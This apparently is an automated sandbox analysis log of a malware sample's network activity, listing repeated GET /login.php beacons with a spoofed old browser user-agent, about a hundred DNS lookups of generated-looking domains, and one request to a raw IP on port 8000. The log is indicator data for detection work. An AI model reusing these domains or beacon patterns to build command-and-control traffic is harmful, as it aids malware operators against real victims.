Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.comCookie: snkz=66.23.206.109; btst=1e822420cb8d3f7ff6bc20592f4b28e8\|66.23.206.109\|1731345185\|1731345185\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comCookie: snkz=66.23.206.109; btst=e5cea2794c01fe0d297510f888cbb928\|66.23.206.109\|1731345186\|1731345186\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_343064.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com

Source: global traffic	DNS traffic detected: DNS query: galykes.com
Source: global traffic	DNS traffic detected: DNS query: gahyhob.com
Source: global traffic	DNS traffic detected: DNS query: puvytuq.com
Source: global traffic	DNS traffic detected: DNS query: lyryvex.com
Source: global traffic	DNS traffic detected: DNS query: gahyqah.com
Source: global traffic	DNS traffic detected: DNS query: pumypog.com
Source: global traffic	DNS traffic detected: DNS query: qedynul.com
Source: global traffic	DNS traffic detected: DNS query: volykyc.com
Source: global traffic	DNS traffic detected: DNS query: lymysan.com
Source: global traffic	DNS traffic detected: DNS query: gadyniw.com
Source: global traffic	DNS traffic detected: DNS query: qeqysag.com
Source: global traffic	DNS traffic detected: DNS query: vofymik.com
Source: global traffic	DNS traffic detected: DNS query: lyxylux.com
Source: global traffic	DNS traffic detected: DNS query: gaqydeb.com
Source: global traffic	DNS traffic detected: DNS query: qexylup.com
Source: global traffic	DNS traffic detected: DNS query: lysynur.com
Source: global traffic	DNS traffic detected: DNS query: vowydef.com
Source: global traffic	DNS traffic detected: DNS query: vonypom.com
Source: global traffic	DNS traffic detected: DNS query: lygymoj.com
Source: global traffic	DNS traffic detected: DNS query: gacyzuz.com
Source: global traffic	DNS traffic detected: DNS query: purydyv.com
Source: global traffic	DNS traffic detected: DNS query: qegyqaq.com
Source: global traffic	DNS traffic detected: DNS query: vocyzit.com
Source: global traffic	DNS traffic detected: DNS query: lyvyxor.com
Source: global traffic	DNS traffic detected: DNS query: lyryfyd.com
Source: global traffic	DNS traffic detected: DNS query: purycap.com
Source: global traffic	DNS traffic detected: DNS query: gatyfus.com
Source: global traffic	DNS traffic detected: DNS query: puvyxil.com
Source: global traffic	DNS traffic detected: DNS query: qekykev.com
Source: global traffic	DNS traffic detected: DNS query: pupybul.com
Source: global traffic	DNS traffic detected: DNS query: ganypih.com
Source: global traffic	DNS traffic detected: DNS query: vopybyt.com
Source: global traffic	DNS traffic detected: DNS query: lykyjad.com
Source: global traffic	DNS traffic detected: DNS query: qetyfuv.com
Source: global traffic	DNS traffic detected: DNS query: qebytiq.com
Source: global traffic	DNS traffic detected: DNS query: vojyjof.com
Source: global traffic	DNS traffic detected: DNS query: gatyvyz.com
Source: global traffic	DNS traffic detected: DNS query: qetyvep.com
Source: global traffic	DNS traffic detected: DNS query: lyvytuj.com
Source: global traffic	DNS traffic detected: DNS query: vojyqem.com
Source: global traffic	DNS traffic detected: DNS query: gacyryw.com
Source: global traffic	DNS traffic detected: DNS query: qeqyxov.com
Source: global traffic	DNS traffic detected: DNS query: pufygug.com
Source: global traffic	DNS traffic detected: DNS query: lygygin.com
Source: global traffic	DNS traffic detected: DNS query: pujyjav.com
Source: global traffic	DNS traffic detected: DNS query: vowycac.com
Source: global traffic	DNS traffic detected: DNS query: qexyryl.com
Source: global traffic	DNS traffic detected: DNS query: gaqycos.com
Source: global traffic	DNS traffic detected: DNS query: qegyhig.com
Source: global traffic	DNS traffic detected: DNS query: vocyruk.com
Source: global traffic	DNS traffic detected: DNS query: lyxywer.com
Source: global traffic	DNS traffic detected: DNS query: puzylyp.com
Source: global traffic	DNS traffic detected: DNS query: pufymoq.com
Source: global traffic	DNS traffic detected: DNS query: vofygum.com
Source: global traffic	DNS traffic detected: DNS query: vonyzuf.com
Source: global traffic	DNS traffic detected: DNS query: lysyfyj.com
Source: global traffic	DNS traffic detected: DNS query: pumyxiv.com
Source: global traffic	DNS traffic detected: DNS query: volyqat.com
Source: global traffic	DNS traffic detected: DNS query: galyqaz.com
Source: global traffic	DNS traffic detected: DNS query: qekyqop.com
Source: global traffic	DNS traffic detected: DNS query: qedyfyq.com
Source: global traffic	DNS traffic detected: DNS query: gadyfuh.com
Source: global traffic	DNS traffic detected: DNS query: puzywel.com
Source: global traffic	DNS traffic detected: DNS query: lymyxid.com
Source: global traffic	DNS traffic detected: DNS query: pupydeq.com
Source: global traffic	DNS traffic detected: DNS query: ganyzub.com
Source: global traffic	DNS traffic detected: DNS query: lykymox.com
Source: global traffic	DNS traffic detected: DNS query: pujymip.com
Source: global traffic	DNS traffic detected: DNS query: qebylug.com
Source: global traffic	DNS traffic detected: DNS query: vopydek.com
Source: global traffic	DNS traffic detected: DNS query: gatydaw.com
Source: global traffic	DNS traffic detected: DNS query: vojymic.com
Source: global traffic	DNS traffic detected: DNS query: gahynus.com
Source: global traffic	DNS traffic detected: DNS query: puvylyg.com
Source: global traffic	DNS traffic detected: DNS query: vowypit.com
Source: global traffic	DNS traffic detected: DNS query: qegynuv.com
Source: global traffic	DNS traffic detected: DNS query: pufybyv.com
Source: global traffic	DNS traffic detected: DNS query: lygynud.com
Source: global traffic	DNS traffic detected: DNS query: gacykeh.com
Source: global traffic	DNS traffic detected: DNS query: purypol.com
Source: global traffic	DNS traffic detected: DNS query: qetysal.com
Source: global traffic	DNS traffic detected: DNS query: lyrysor.com
Source: global traffic	DNS traffic detected: DNS query: vocykem.com
Source: global traffic	DNS traffic detected: DNS query: volymum.com
Source: global traffic	DNS traffic detected: DNS query: lymylyr.com
Source: global traffic	DNS traffic detected: DNS query: gadydas.com
Source: global traffic	DNS traffic detected: DNS query: puzymig.com
Source: global traffic	DNS traffic detected: DNS query: qeqylyl.com
Source: global traffic	DNS traffic detected: DNS query: lyxymin.com
Source: global traffic	DNS traffic detected: DNS query: gaqyzuw.com
Source: global traffic	DNS traffic detected: DNS query: vofydac.com
Source: global traffic	DNS traffic detected: DNS query: vowyzuk.com
Source: global traffic	DNS traffic detected: DNS query: lygyfex.com
Source: global traffic	DNS traffic detected: DNS query: gacyqob.com
Source: global traffic	DNS traffic detected: DNS query: puryxuq.com
Source: global traffic	DNS traffic detected: DNS query: qegyfyp.com
Source: global traffic	DNS traffic detected: DNS query: vocyqaf.com
Source: global traffic	DNS traffic detected: DNS query: lyryxij.com
Source: global traffic	DNS traffic detected: DNS query: gahyfyz.com
Source: global traffic	DNS traffic detected: DNS query: puvywav.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDDu%2FsrzGXWHHKKGVBYI2S6m%2Fzoka67dQJ89SciC3%2Bxio3CC9HtqhehLr0I7ENnEt7K7yDM7sepmi25Jlg5PC30Kw5jCglsLlG5BeOwwF3nQ2jJYN8uxXoMdbKrpvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe91d8fe55e61-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1279&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2238021&cwnd=244&unsent_bytes=0&cid=2b60c149bad0ee63&ts=943&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BI6BsDE4j6UOAr484GISj1CgSyucJ%2FFwlk%2BQ9KGIBH93dgwZb5U2Ry3qQwciQvPFZAzPlK%2BVCFMP0H%2BwlYWq0cLRqZI9GxRDQClQkf5QYZenGIH33h5M1Be4MxC%2BXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe927b92f5590-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2195602&cwnd=250&unsent_bytes=0&cid=b9e9f4a62d052aba&ts=876&x=0"
